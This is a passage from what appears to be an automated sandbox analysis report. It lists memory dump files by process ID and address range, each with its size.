                                                                                                                                                                                              • memory/4056-232-0x0000000000D80000-0x0000000000F05000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1.5MB

                                                                                                                                                                                              • memory/4056-201-0x0000000000D80000-0x0000000000F05000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1.5MB

                                                                                                                                                                                              • memory/4056-236-0x0000000075560000-0x00000000755E9000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                548KB

                                                                                                                                                                                              • memory/4056-283-0x0000000072970000-0x0000000073120000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7.7MB

                                                                                                                                                                                              • memory/4252-255-0x0000000002340000-0x00000000023A0000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                384KB

                                                                                                                                                                                              • memory/4252-265-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3.9MB

                                                                                                                                                                                              • memory/4252-274-0x00000000028A0000-0x00000000028A1000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                4KB

                                                                                                                                                                                              • memory/4252-268-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3.9MB

                                                                                                                                                                                              • memory/4252-261-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3.9MB

                                                                                                                                                                                              • memory/4252-271-0x0000000000400000-0x00000000007E4000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                3.9MB

                                                                                                                                                                                              • memory/4532-257-0x0000000004B80000-0x0000000005198000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6.1MB

                                                                                                                                                                                              • memory/4532-205-0x0000000000390000-0x00000000003B0000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                128KB

                                                                                                                                                                                              • memory/4532-251-0x0000000004D10000-0x0000000004E1A000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                1.0MB

                                                                                                                                                                                              • memory/4532-246-0x0000000004BE0000-0x0000000004BF2000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                72KB

                                                                                                                                                                                              • memory/4532-256-0x0000000004C40000-0x0000000004C7C000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                240KB

                                                                                                                                                                                              • memory/4532-242-0x00000000051A0000-0x00000000057B8000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                6.1MB

                                                                                                                                                                                              • memory/4532-210-0x0000000072970000-0x0000000073120000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7.7MB

                                                                                                                                                                                              • memory/4556-290-0x0000000004870000-0x000000000502E000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                7.7MB

                                                                                                                                                                                              • memory/4880-313-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                128KB

                                                                                                                                                                                              • memory/5052-300-0x0000000000400000-0x0000000000420000-memory.dmp
                                                                                                                                                                                                Filesize

                                                                                                                                                                                                128KB